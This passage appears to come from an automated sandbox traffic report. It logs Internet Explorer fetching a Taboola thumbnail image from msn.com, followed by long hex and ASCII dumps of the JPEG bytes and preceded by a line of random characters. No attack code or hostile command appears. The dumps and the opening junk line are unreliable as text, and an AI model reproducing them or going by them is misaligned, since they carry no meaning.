W~+QlCm}ze(Ds5m-2,!\y9MQ{\t3QPtz7ER4+JYM60HX)E2+]yeSM!PI.qSnL=l#ZgC)+V!~'G[g&+h%J*a'/13~]a:~`J+wb.`2NVaLEa
2021-10-02 16:13:23 UTC	82	IN	Data Raw: 72 80 f6 a2 53 64 a5 5e 81 bd 1c 50 4d ed d1 a5 ac 2f 68 4a 61 e9 31 83 e1 1a fa 4d d8 43 99 69 1a 4b fd 64 38 3f aa 46 a5 86 76 35 2a b2 e8 d5 19 cd f4 e8 22 25 30 2c 05 b4 12 93 73 2a 5a cc 39 5f 4f d0 c2 4d 82 df 9d b7 9a 04 d2 1b 02 6c 26 e4 cb e8 04 fb 4b 15 a4 b7 d5 9c cb ae 19 0d 3a 5e 2e fa bb 41 c2 99 81 9f 10 13 6c 0d 7f d1 98 4b a9 42 7d 08 8c f8 67 56 ce 1b 53 4c 87 20 b2 f8 45 5c e7 33 15 00 66 27 9e 9d 96 71 08 a5 84 a6 2a 55 e8 d5 39 03 e0 20 29 7c b9 6e 38 bc 23 51 a4 ea d8 f0 85 b4 a6 f4 aa 05 74 5f 02 1e 68 03 19 a3 d4 28 a7 ca 6e 65 f8 c4 d7 19 89 42 d6 fc 09 a9 68 a9 49 05 91 2d 2c 42 66 51 79 6a 95 08 2e 5b 42 41 d8 79 08 05 47 5b 2b 1e 40 1b 69 06 6c 84 7a dc ce 2b 4a 94 8d 17 0f 9e 9d 8e a4 11 66 ea 25 0a d8 7a 42 e5 e9 1b 3d bc a1 Data Ascii: rSd^PM/hJa1MCiKd8?Fv5"%0,sZ9_OMl&K:^.AlKB}gVSL E\3f'q*U9 )\|n8#Qt_h(neBhI-,BfQyj.[BAyG[+@ilz+Jf%zB=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49825	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:13:23 UTC	48	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-02 16:13:23 UTC	112	IN	HTTP/1.1 200 OK Connection: close Content-Length: 43979 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 617570617185133121904026737882128670923,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "ab6cad136c683affdd2e13f6ff9d8064" last-modified: Sat, 31 Jul 2021 17:35:14 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 99 x-ratelimit-reset: 1 x-request-id: df5ec6099bd1db1c1e26f45cb238e8dc x-envoy-upstream-service-time: 21 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb803 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Sat, 02 Oct 2021 16:13:23 GMT Age: 2850339 X-Served-By: cache-wdc5553-WDC, cache-dca17750-DCA, cache-mxp6958-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 2, 1 X-Timer: S1633191204.837115,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg X-vcl-time-ms: 1
2021-10-02 16:13:23 UTC	113	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 07 07 07 07 07 07 08 09 09 08 0b 0c 0b 0c 0b 10 0f 0e 0e 0f 10 19 12 13 12 13 12 19 25 17 1b 17 17 1b 17 25 21 28 21 1e 21 28 21 3b 2f 29 29 2f 3b 45 3a 37 3a 45 53 4a 4a 53 69 63 69 89 89 b8 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 00 09 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 04 01 00 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 37 f2 7d 0f 38 55 8c 5f 93 5e 73 be Data Ascii: JFIF&""&0-0>>T%%!(!!(!;/))/;E:7:ESJJSici767}8U_^s
2021-10-02 16:13:23 UTC	114	IN	Data Raw: 38 f2 6e 31 02 80 c0 1d 6f 1e 2d 99 4e e8 a8 0e 6c fb 6a 0b c1 9b c7 c7 f4 57 2f c7 ef 9d 47 4e 34 35 93 b0 27 71 1b 83 2b 59 2f 21 97 92 6a 04 f4 46 fb 93 6d c0 72 a3 65 01 85 0b 6c e5 73 2d 4c 82 42 bb 77 34 10 ee 9d ca aa 67 01 7c cd 59 9c e8 13 4a 5a 80 3d d7 dc af 20 9f 91 cc e7 2a 5b f1 47 91 7d 6f 1d ce 5a 9b ca 45 da b0 77 8e c4 f3 a9 ee 2c 16 c2 6f 4b d1 8c 7c f6 f2 ec c8 55 b7 6a 45 bf bb a1 f7 27 6d 90 59 c9 67 2d b5 24 02 74 20 6f 89 8e 1d 0d 4e d1 71 3c 15 8c cd f5 08 35 b0 5f a4 ae 16 f7 14 6e 5d 53 c8 6b 61 71 47 67 40 63 fa 4e bc 01 fd dd 57 b9 f6 f9 3c 41 7d f8 97 ee ee 5d cb 0b 23 1f a2 7e 80 d6 28 90 db 16 90 70 b5 d2 da 02 e1 b2 d1 7c e8 6b 37 78 1a b6 a4 fd cc 7a 04 fa 16 2b 52 e4 d4 f3 c2 d0 18 c9 9b a7 86 6d 7f 47 cb 4c 38 50 d3 d5 Data Ascii: 8n1o-NljW/GN45'q+Y/!jFmrels-LBw4g\|YJZ= *[G}oZEw,oK\|UjE'mYg-$t oNq<5_n]SkaqGg@cNW<A}]#~(p\|k7xz+RmGL8P
2021-10-02 16:13:23 UTC	115	IN	Data Raw: 78 ae df d0 fd 87 e6 5a c8 8b 99 a1 44 53 ea 32 f9 83 6e 3d ac 11 94 15 55 80 2d 76 35 68 5a ca 42 2f 1d 82 c8 1a 88 4d 20 6a ac d9 2b ca af d7 2d 59 e9 a7 ba d9 7c b4 66 84 22 38 e0 09 d9 f3 5a 47 f5 db f0 ea 0b 4a 94 16 26 7c 35 36 c9 66 5b 4c 82 b3 c2 94 87 c4 cb 61 4c 3c f3 2d 2d f7 9e bc d1 cc d0 be 5f 1d 92 ba 6d 34 0c b0 ea 96 25 40 6a 2b 9b 7a 1a 48 db 99 8a e5 c8 ca d3 86 a7 ce 96 80 76 75 53 d4 fc 97 66 b1 19 97 94 9f 3f 05 b5 a4 66 d4 6c e2 88 ab 41 b2 1b 2f 4b d4 b4 5b 8c cd 94 ba 1c cd bc 78 60 6a 3e 96 7e cd 7f 5c 99 75 39 f9 a8 d9 43 9f 0b 3e 96 b1 c4 2f 85 5e e1 df 2c f3 ad b2 59 11 69 34 b2 a4 71 59 35 0b 5d b2 6d f9 16 89 7b f5 df b0 f0 cf e8 ce 08 2c 22 17 01 7f 2d 4f ba c8 35 65 d4 26 de f0 57 09 7f 5e 17 0c 79 e6 5e 05 ea dc 0a 57 80 Data Ascii: xZDS2n=U-v5hZB/M j+-Y\|f"8ZGJ&\|56f[LaL<--_m4%@j+zHvuSf?flA/K[x`j>~\u9C>/^,Yi4qY5]m{,"-O5e&W^y^W
2021-10-02 16:13:23 UTC	117	IN	Data Raw: 9c 2d 11 8c ca 32 5a c7 01 e7 2b 85 9a 13 34 3e b9 a0 12 9b 46 06 7f db 64 c8 c2 4a 5b 0f 45 d8 3e f4 0c 33 9b 95 68 5e 0f 0c ea 15 a6 5d a3 af d3 be ef 5a ca 70 51 fd c7 6f 48 c3 93 67 24 70 45 e7 14 03 7c 48 93 2b e7 f9 62 55 a8 2d bf ac 18 50 40 e3 53 ce 1f d1 e1 d6 e0 d0 a5 9f 56 87 df 97 75 f7 53 7b 87 76 0c da 85 0c a8 b6 86 23 b5 c7 ce 9b 6b 27 bd 37 38 ba fd 03 15 9f e4 12 af 4f 8a b7 e9 60 5a 56 4e 79 11 09 2e 35 23 01 1b 10 45 54 2b 15 e1 fe 5a a6 79 3a 17 c3 cf 6e b3 b0 f8 f5 1d 70 0a 9d 29 6e c5 62 9f 3b f5 0f 69 e0 66 52 17 9f 78 06 4b 17 0a 4c 9d ba 37 7e 77 9a a6 99 6a 26 f7 db b4 cb ec b9 6a db 64 f9 a3 22 89 20 28 88 bf 4a 49 f5 c0 74 70 09 91 5c aa 37 da e1 2a aa 45 e8 1d cb ea 01 46 e9 5d d0 d6 8e 93 c9 90 6f 8f 1d ff 00 2d 45 a4 57 a2 Data Ascii: -2Z+4>FdJ[E>3h^]ZpQoHg$pE\|H+bU-P@SVuS{v#k'78O`ZVNy.5#ET+Zy:np)nb;ifRxKL7~wj&jd" (JItp\7*EF]o-EW
2021-10-02 16:13:23 UTC	118	IN	Data Raw: 8f 75 b9 5d 62 a5 3f 0e e2 c9 40 ee 11 35 06 f3 2c 5b 32 54 8d dc 1d e5 21 3c 06 ce 17 c1 6f 8b c4 d2 8b 4b b7 49 e9 65 67 21 68 6b 45 aa a0 a9 ff 00 c5 d3 aa ce cf ed fb 6b 38 52 0a 4c f3 81 f7 c8 bd 77 3b e8 f9 d1 43 06 8d d5 cc 21 9b 99 2b a7 48 1d bf b0 ae c9 01 e8 7f e1 5b 8f 47 b6 a4 e8 d0 3f d9 e9 75 ff 00 a3 66 7b 05 97 45 18 4e c8 11 8c cf 37 18 30 c9 0e b5 26 88 65 b6 59 6a 74 12 52 9a bb b4 25 ba f4 a4 a5 d2 60 8a 09 51 be 50 bf 53 72 9b e0 53 fb 84 ad 79 ec d5 64 1a 39 33 3f 5b 35 1a b7 23 2e 6a aa 34 e8 a8 70 0b 2c dd d6 5c 5c 55 ff 00 8b 94 0c ec 22 7b 9d 22 c3 3a b2 5d eb 39 0b a8 46 de ca ac dd 9b e8 af d4 2f 57 a7 6a 5e ab 23 9d b6 14 e5 72 6f 5c bd 7c c6 83 9b b1 a1 b7 9a be 3e f2 6c ce 3e f4 ac 50 42 d4 1e 2b cd e9 1e ee 4b eb 3b b4 bb Data Ascii: u]b?@5,[2T!<oKIeg!hkEk8RLw;C!+H[G?uf{EN70&eYjtR%`QPSrSyd93?[5#.j4p,\\U"{":]9F/Wj^#ro\\|>l>PB+K;
2021-10-02 16:13:23 UTC	119	IN	Data Raw: 0d 78 2f 3b 7e b9 52 66 26 09 88 e3 3a b6 cf d9 cf 9e 43 a5 c6 eb 40 77 a2 a1 06 bf 7e d0 a2 69 67 9b 7d b7 00 5e f0 a5 a8 61 83 ac 13 47 3f f7 e6 93 67 bb cc 60 81 24 ce ad d4 20 75 62 ba 85 be f1 6e 8c f9 5c e5 65 b1 12 da f9 39 34 5c 89 d2 a2 57 33 1d ce 53 d6 7c 96 1f 5b c1 41 bd cb ec e1 db 15 33 8f 23 64 39 77 39 ce ff 00 e7 e1 82 95 2f 05 90 e7 8b 7f 9f be ce 17 13 b2 a7 df a0 ce 54 5c 6f d0 62 bb dc 76 8d 9f 4f ab 17 e6 de c1 e4 d4 14 e0 35 88 fd 0b 1b eb ba b6 c1 b6 39 c3 1f 4d f3 13 8a 23 4e 11 f8 b2 fd b5 72 ab ee 23 3d b5 cf 1b a8 3d 3e 75 69 da f5 c9 c9 d1 2f c7 80 8f 6b e7 5b cf f2 db 73 15 f7 c7 f3 9b 64 1a 0f e6 2f 9a 5d aa 1c a6 a9 9f e6 cf e9 e7 a1 cf 66 db e3 ee 9f 98 79 9b af 46 58 ac 71 5b 9d 9f f2 4f 2b 54 6c 1a fc 50 37 9b fb 8e 77 Data Ascii: x/;~Rf&:C@w~ig}^aG?g`$ ubn\e94\W3S\|[A3#d9w9/T\obvO59M#Nr#==>ui/k[sd/]fyFXq[O+TlP7w
2021-10-02 16:13:23 UTC	121	IN	Data Raw: 38 bd 97 ae 6c a9 df ab 4a b7 e5 99 cc 00 e5 ee da e6 16 33 c7 e7 ed 4c 4d eb b2 59 c0 74 50 79 5c 14 50 de 22 25 a3 a2 bf f4 a0 7d 37 11 4b 9b 52 da bf a3 96 1d d6 56 ec c7 27 da 6d 97 4f 0d 4f 62 b6 af ba 24 65 6c d5 d7 70 74 17 ed 1f cf e7 ab 39 a4 2e bd 4a 2c 82 cd 10 ca e3 71 44 f2 f9 59 43 75 99 0a 06 2a b9 5b 64 ab a6 ce 7d 3e 2d e5 ab 48 8c fe eb ec aa be c8 8b be 3c c4 e3 b5 81 68 da dc 77 b3 ea 71 39 15 98 b2 6b 33 39 a9 63 b4 0c a7 85 51 09 c6 12 e4 a3 67 dd db 7e ef cf 59 7c 5e c5 6d cb 4c 1b d4 fc 46 fc a4 2c 7b 97 a3 c7 f4 f9 7d c8 0a b2 84 fc 66 40 ac e6 14 87 6f 7c af d0 cc ff 00 16 5c aa 77 ae 65 fb 14 cb bc ec a3 de 76 33 e4 17 9a 48 4f a1 11 eb 67 7d b4 f6 10 b4 5c bf 9d e1 b1 44 e7 f3 88 da 31 b9 71 bd ba 4d 69 28 bb 05 cf 32 22 51 cf Data Ascii: 8lJ3LMYtPy\P"%}7KRV'mOOb$elpt9.J,qDYCu*[d}>-H<hwq9k39cQg~Y\|^mLF,{}f@o\|\wev3HOg}\D1qMi(2"Q
2021-10-02 16:13:23 UTC	122	IN	Data Raw: 97 be c5 71 31 9d 19 e0 7d 81 83 6a d5 65 3a 65 de 6d ec 3a 86 ad f3 d9 73 2c a5 4e 60 cd 5b 57 e7 1c c9 1b 35 51 ae de c3 d0 85 1e cf 2b d9 17 fa b4 53 c8 51 47 6b 93 66 65 2f ac 8a b9 c8 d7 3a 45 fb 39 cc cc 65 21 ac ec 7e 1b 4f b7 53 d9 c6 09 54 7f 5c db 47 fc 8a 31 13 26 e9 d0 57 00 a6 35 ff 00 f9 f5 3d 9c 98 a6 43 9c cb 1b 5d 65 b0 ed 90 d7 b0 0a 68 ae af 92 a2 95 c3 8d 6d ab 87 3b d8 73 ea 6b b8 7c d8 d6 d3 b5 f4 cb b9 06 50 ce f9 c2 7c e4 29 95 dc e1 93 a6 9e 42 88 f2 16 5f 4f 7e ee 7a 45 e3 83 87 2f bf b5 a9 f6 36 0d 8c 9d 19 51 9c 66 74 45 dd 49 ef 6c 58 d8 7b ea a8 49 28 f5 4b e2 89 9e 79 d3 7b fc af 1c 92 df 4c ce 69 81 4a db 5a d9 06 3c 4d 4e 71 d6 0f e6 8b 31 61 36 d6 da 3e af f5 33 0d a6 fc a0 42 16 46 35 f7 9c d2 b6 12 59 97 fc a0 9b a3 ff Data Ascii: q1}je:em:s,N`[W5Q+SQGkfe/:E9e!~OST\G1&W5=C]ehm;sk\|P\|)B_O~zE/6QftEIlX{I(Ky{LiJZ<MNq1a6>3BF5Y
2021-10-02 16:13:23 UTC	124	IN	Data Raw: e0 af f6 cd 5f 40 7f d5 81 98 11 e3 13 6a c8 b6 c0 b5 f4 1c d5 f9 c3 29 87 d4 66 35 0a bc 2c d6 38 a7 6d 8c 07 ee 0e 7f 0c 9b 6f e1 48 9e a0 6e 78 06 26 da c0 1c f5 a5 88 d4 a9 63 c8 eb 8b 22 48 2d 18 1c 92 08 65 fa 96 8f 91 9f e1 a5 56 0a 0a 90 3a 1c 2a 77 9b 3d 3a e0 88 1d 29 36 54 18 cb 13 77 fe ac aa 11 32 b3 03 5e ea ec 47 7c 77 2f 5e b3 39 5f 28 7f b8 c0 4c cc 09 8e 33 12 5f b9 8d 9a c5 6f 55 8e c9 c0 45 02 d4 2f fc 9c 2a de a8 a8 c7 a5 dd af 18 37 aa a0 20 68 c8 e5 8b 61 b4 3e f9 50 c4 c4 8a 23 14 7a 4c 42 42 4c 6d 5e e5 6b c3 22 e9 ee e6 2e 3b 03 9a c9 1e 78 5e d6 97 a7 3d 73 f0 f2 bb 5e a8 55 dd 0a c4 af 71 1d 0b 1c d4 93 bd 7e d8 42 92 09 ea 3a 11 c1 19 11 3e a2 06 01 bd c2 98 70 7f 5e c7 35 95 b4 57 f5 0c 42 0c 6e ae e4 59 14 a3 bf df 07 b7 68 Data Ascii: _@j)f5,8moHnx&c"H-eV:w=:)6Tw2^G\|w/^9_(L3_oUE/7 ha>P#zLBBLm^k".;x^=s^Uq~B:>p^5WBnYh
2021-10-02 16:13:23 UTC	125	IN	Data Raw: 21 37 7b 8a c2 b1 d7 f2 d0 c8 cb c6 43 27 14 30 6b e4 46 bd 8b 78 ef a9 d4 bb 3b 1d b6 7a 9c 7d 8b 76 f5 5d 6f 29 4d d3 5e 53 ee e5 45 50 fb de 30 25 6b 77 db 36 16 14 dc d0 e5 73 d2 52 09 5d c0 58 1c 8c 6b 56 a3 c1 15 9a a0 3d 29 6f b8 cf c0 54 ca 88 f5 ed 48 cd fd cb 61 1e ac bf 17 7f a0 cd 49 24 04 18 f5 14 4a b9 02 49 bc fb 18 02 0d 76 c6 14 5c 10 6c e1 35 fb e2 ab 30 cd 81 39 14 4f ce 33 10 18 aa de d4 66 a1 d6 94 59 a1 df 25 d7 45 0c cf 1c a1 cc 6d 0a 3c 72 45 44 95 95 09 0e 2f b2 d6 34 9a 89 e9 83 08 8c ba 48 84 e4 13 b6 42 a0 a1 b0 3c 8e a3 20 d3 e9 2d c0 dd 2f f0 e3 0c 48 fe 1f 00 0a 1e 6e b1 55 df 85 5e 06 32 fa 23 dc ac 4f c0 c5 f5 a5 65 e3 6a 5f ef 87 eb 23 14 fb 47 db 04 44 6d 28 a0 1e 8d 80 05 14 14 0f b6 05 76 00 85 24 74 bc 68 d8 f5 46 fd Data Ascii: !7{C'0kFx;z}v]o)M^SEP0%kw6sR]XkV=)oTHaI$JIv\l509O3fY%Em<rED/4HB< -/HnU^2#Oej_#GDm(v$thF
2021-10-02 16:13:23 UTC	126	IN	Data Raw: 3c e8 07 fa bc 60 8f 53 37 53 b5 32 38 22 8b a0 b3 e4 e4 7f e6 cd f7 18 48 19 6c dd 05 0f 27 1d 52 37 0d 7b 87 8f 9c 67 9e 62 03 36 c0 7a 28 eb 86 17 79 42 26 f4 50 39 3f cc 49 ed 85 42 b1 05 3f f5 28 12 49 b2 38 c8 e2 9d 64 62 36 07 5f d9 87 e9 9b 4c d1 df d0 e5 6b c9 04 62 ea ca ee 13 1b ae 8c a3 83 9a 89 88 11 c5 12 2b 3b 11 b6 c5 d6 2c 4d 07 b4 c9 bd 9b b9 fe 63 f0 0f 4c 0d 04 c9 11 de 01 54 50 e0 f9 03 9c de b1 59 27 db 79 eb e9 cf 21 eb e0 a9 ac 6f a9 a8 82 2f f2 e3 37 01 d7 39 ec 33 fc e9 94 b5 00 ec 69 ab c6 4d e9 98 d6 20 fc 81 57 8c 49 36 cc 7a 50 ae 73 48 88 21 49 08 b6 6e e7 39 39 60 64 65 8b cd b7 8e 46 3c f0 c6 78 f7 b6 15 d4 4f cb b6 c5 f1 8a 8b 1c 91 aa f8 3d 71 e1 7e 7b 82 45 d7 07 2c df 1e e3 7c ff 00 29 1f a1 c9 ca 96 52 28 8c 5b 2c a0 Data Ascii: <`S7S28"Hl'R7{gb6z(yB&P9?IB?(I8db6_Lkb+;,McLTPY'y!o/793iM WI6zPsH!In99`deF<xO=q~{E,\|)R([,
2021-10-02 16:13:23 UTC	128	IN	Data Raw: c1 c4 94 44 28 d8 3f 3d 0e 33 a4 95 fc b4 38 ac 58 58 89 a6 56 55 8c 0e a7 b8 cd 6c 91 2c 71 45 09 e1 94 33 38 3f 57 ef 85 41 be d5 9e e4 1d 2f 0a 96 eb 9f c1 54 04 33 09 3e 32 3d 6b a9 02 41 63 cf 7c 49 e3 93 fc bd cf f6 1f fc e3 6a 82 c8 a8 63 3f ea f8 19 a8 52 60 93 6f 50 2c 77 e9 9a 24 12 ce bf 1e e3 92 69 10 9b 8c 95 38 5a 48 8d 48 9c 79 c8 dd 6c d7 ba c6 76 a3 ce 7a 65 58 34 6d 44 60 95 78 59 90 83 fd 43 09 e4 91 ce 5f 73 8d 6c 15 17 ab b0 03 26 95 21 6f 4a 3e 40 3b 45 0b 2c 7e 00 c6 9d 59 1c fb 95 ae ad 85 8c fe 13 9f 74 4c 96 48 12 c5 cd fd c6 37 a9 c3 be d9 d0 74 96 33 4e 2b cf 71 fa 8c 89 35 0f 14 32 95 26 09 4d 2c 8d 4a c3 e4 8c 59 34 ba 4d 70 f4 f7 b7 f0 ef 93 60 31 cf 5a 59 a2 9f dd f5 3f 41 f2 6f 3a 22 8a 17 55 96 a0 b0 2d ce 58 ac 20 90 68 Data Ascii: D(?=38XXVUl,qE38?WA/T3>2=kAc\|Ijc?R`oP,w$i8ZHHylvzeX4mD`xYC_sl&!oJ>@;E,~YtLH7t3N+q52&M,JY4Mp`1ZY?Ao:"U-X h
2021-10-02 16:13:23 UTC	129	IN	Data Raw: d6 34 37 7b 3f 63 81 d9 0e d3 fb 1c dc 3a d7 27 b1 cd ae fd 07 fb 8c 82 79 e1 75 2e 9e d1 5c de 2c da 7d 54 48 ae 15 c6 de bd c1 3f 38 d0 07 9d a3 8c 17 fe 28 f8 e8 a4 d6 6a 41 1c 30 a2 18 83 9a 3d 79 d2 37 a7 34 7e a4 40 d8 17 ca ff 00 f5 9a 8d 4b eb 35 72 ea 1f 86 73 d3 c0 02 80 c6 61 e3 f2 59 99 45 10 08 18 ec 42 91 d2 fc 7e 5a a8 f7 05 3e 32 e3 f1 91 ca 22 70 c0 7d fb 71 8f 2c 48 24 62 d7 b2 b7 57 24 5f 7c f9 07 25 96 c7 b4 71 7c 93 d3 f4 c5 e8 2b bf 3f be 0b c7 9e 34 e3 ea 3e 06 20 d4 48 ca ec 02 20 37 5d 2f 01 e5 b8 20 63 1f 70 0b d6 ba 1c b5 6e 24 4a c6 80 f5 46 b1 8b 31 50 55 97 9f 9c 8e 65 2b d2 8f 82 70 a2 fd 40 85 6f f4 f0 32 09 65 d3 cc 25 6b 22 a8 9b 24 64 c0 6d 56 07 82 d7 91 44 da d7 79 37 84 50 68 9e a6 cf c6 36 95 a3 90 ad 90 c3 b1 5a bc Data Ascii: 47{?c:'yu.\,}TH?8(jA0=y74~@K5rsaYEB~Z>2"p}q,H$bW$_\|%q\|+?4> H 7]/ cpn$JF1PUe+p@o2e%k"$dmVDy7Ph6Z
2021-10-02 16:13:23 UTC	130	IN	Data Raw: 02 09 04 02 02 03 00 00 01 02 03 11 00 04 12 21 31 41 51 13 22 61 71 81 10 32 14 23 42 52 72 91 a1 b1 c1 05 33 62 d1 20 82 15 92 53 e1 f1 ff da 00 08 01 02 01 01 3f 00 89 65 91 b6 47 b8 cd cf b0 8b dd 5e 32 e3 66 f7 a9 8a 40 7a 8c 26 44 15 22 07 5f 2b fe 46 44 ba 76 05 85 1e 7b e6 d6 4c 67 01 18 fc 62 37 a6 48 12 a0 5b 34 a6 d8 d7 8f 68 c9 cc 1a 86 46 52 43 8f 22 83 62 2c c8 8f b2 32 cc 4e 22 6a d8 82 e5 51 7b 81 cd e6 e3 74 dc 8f 8c f5 55 99 95 03 0a 1c 93 80 7b c6 31 0d a9 03 c0 c9 64 f4 9d 57 6d 86 16 73 f4 80 07 11 d7 dc 64 8c 64 7d c7 af d7 a6 43 33 23 11 bc de c3 5d eb 22 1b dc 5b 1b e7 9c 90 7b 58 16 bf 69 e3 15 81 e3 b8 c2 06 55 f0 6b 21 b1 a8 89 41 3b 6e ea ec 66 b7 ac 67 e0 e4 8a 57 fd 36 1f 99 2f fb e6 98 06 99 9b b8 53 92 48 f3 16 59 14 4a a0 Data Ascii: !1AQ"aq2#BRr3b S?eG^2f@z&D"_+FDv{Lgb7H[4hFRC"b,2N"jQ{tU{1dWmsdd}C3#]"[{XiUk!A;nfgW6/SHYJ
2021-10-02 16:13:23 UTC	132	IN	Data Raw: e7 9c 11 05 8f 64 f2 07 06 9a 88 e3 f9 62 c8 03 a2 88 aa d8 78 39 16 e9 24 2a 52 b8 2c 08 36 0e 1d 38 10 bb d9 bb 24 e4 00 91 f1 78 ae 24 bf 6d 01 d0 e6 db e7 a6 30 1b 45 79 c2 48 1c f6 c8 ad 90 39 ee 4f f2 cd 53 0f 62 f7 20 9b f8 18 a5 94 da b5 5f 5f 04 60 75 af dc 3f 1c af f2 ed f6 c0 ce 14 12 80 a1 e9 cd 8f b6 26 c7 20 86 aa 23 86 ce 39 ac 24 f7 62 7f 0a e3 ef 88 09 c3 22 45 7c ee 6f 03 1e 59 1f c2 8f 03 00 35 7d bc e2 7e b6 3d f1 53 12 7b f0 a0 66 c4 8a 33 eb cb bc 11 ba 88 a1 f0 00 ef 86 6d 2e cb 69 1c 80 83 84 a0 dc 9e 94 71 5a 20 0b 0a 0a 49 ab 36 4d 79 c5 66 07 76 fb 20 df 39 1b ba 30 31 95 b1 cd 73 47 25 d5 49 1c 65 51 01 66 50 49 6e d7 86 32 b0 ae c6 e7 c8 6e 0e 40 e6 40 55 80 57 5e c3 a1 18 6e f0 f4 38 dc a1 fe 1c 80 ee 81 2f e4 9f e6 73 4b 73 Data Ascii: dbx9$*R,68$x$m0EyH9OSb __`u?& #9$b"E\|oY5}~=S{f3m.iqZ I6Myfv 901sG%IeQfPIn2n@@UW^n8/sKs
2021-10-02 16:13:23 UTC	133	IN	Data Raw: 56 36 d7 df c6 4f 09 d4 23 c6 ac 03 05 20 15 6e 97 e7 0e 97 56 e1 56 45 14 bc 6e 56 18 74 68 ea b6 cc 36 8a 15 e3 f1 40 4b a0 0b 7c 8e 33 53 a6 78 18 93 b6 89 e0 0c 88 0d fe ee 94 4d 7d 06 6e ae 47 18 34 ed 34 50 53 6c da 0d ee 07 b9 c6 78 a0 8e 22 cb b8 8d c1 0d 78 c9 27 9a 5e ad b4 78 18 5c 8e 84 8b 39 c3 a2 9a e3 6f 4c 3b 14 d5 8e 0f b6 ba d6 7a 53 95 e2 26 0b 5d 68 61 d3 c8 61 12 21 a6 50 28 df 0c a7 20 11 ee 66 33 7a 92 2f 27 e3 77 8f 8c 69 69 cd ad a9 e9 5c 1c 51 19 62 c9 5b 8f 63 d7 36 1a ae 2f e7 0f a8 1c 0c d2 6a 60 b9 55 98 ab 06 60 6c 5e 24 f1 bc 8a 10 1f 92 7b 8e f9 10 87 71 68 c5 13 89 09 23 73 b9 20 f6 03 68 e3 14 05 14 ab 42 bb 67 a3 3c 4a 00 96 47 f1 42 f2 3d 39 4e 5e 67 62 7e 4f e1 16 9a 39 74 ad b1 7f 5b f9 af fc 66 98 49 ba 97 68 62 0f Data Ascii: V6O# nVVEnVth6@K\|3SxM}nG44PSlx"x'^x\9oL;zS&]haa!P( f3z/'wii\Qb[c6/j`U`l^${qh#s hBg<JGB=9N^gb~O9t[fIhb
2021-10-02 16:13:23 UTC	134	IN	Data Raw: a8 79 a3 55 ce 3a 83 15 2d 83 e4 7c 1c d5 2b ab a4 45 cb b1 a0 07 8e d8 9a 38 d2 3a 6e 58 b7 38 a7 df 66 87 15 8f d5 fb 8d c7 1e 18 e4 7b 1c 58 e7 1a 37 40 d6 3a 65 e7 5c 0c c8 43 29 a3 92 e9 12 53 ba 36 0a 7b 8e c7 1e 39 22 34 ea 47 cf e2 2d 79 53 59 1e b0 d5 4a b7 f3 80 47 28 f6 35 fc 1c 2c f1 ae c3 ed 18 e1 d4 27 4d ac 38 ac 8d a2 0a 6b da ff 00 38 b0 48 0d 11 76 c0 de 49 14 2b ca 4c 03 03 65 7a a9 fa 64 14 ec 2e ac 62 99 50 ca 5d 8b 8f fa c5 9d 19 37 b1 0a 2f be 6a 26 40 37 da c8 a7 8c 68 e6 91 20 f4 f7 22 b5 1e 7b 59 c3 02 26 a0 4b c9 6d b5 fe 2f 25 99 23 70 ad 7c 82 68 66 e9 64 ad be d5 60 6b 8b 38 63 68 cf 18 b2 f2 37 8a e4 62 bf 5e 84 11 8f 0a 3c 62 8d 10 7f a6 4b 13 46 e0 76 22 f1 41 63 43 ae 0b be 3b 60 70 41 52 01 18 fa 48 e4 b3 19 af 8e d9 24 Data Ascii: yU:-\|+E8:nX8f{X7@:e\C)S6{9"4G-ySYJG(5,'M8k8HvI+Lezd.bP]7/j&@7h "{Y&Km/%#p\|hfd`k8ch7b^<bKFv"AcC;`pARH$
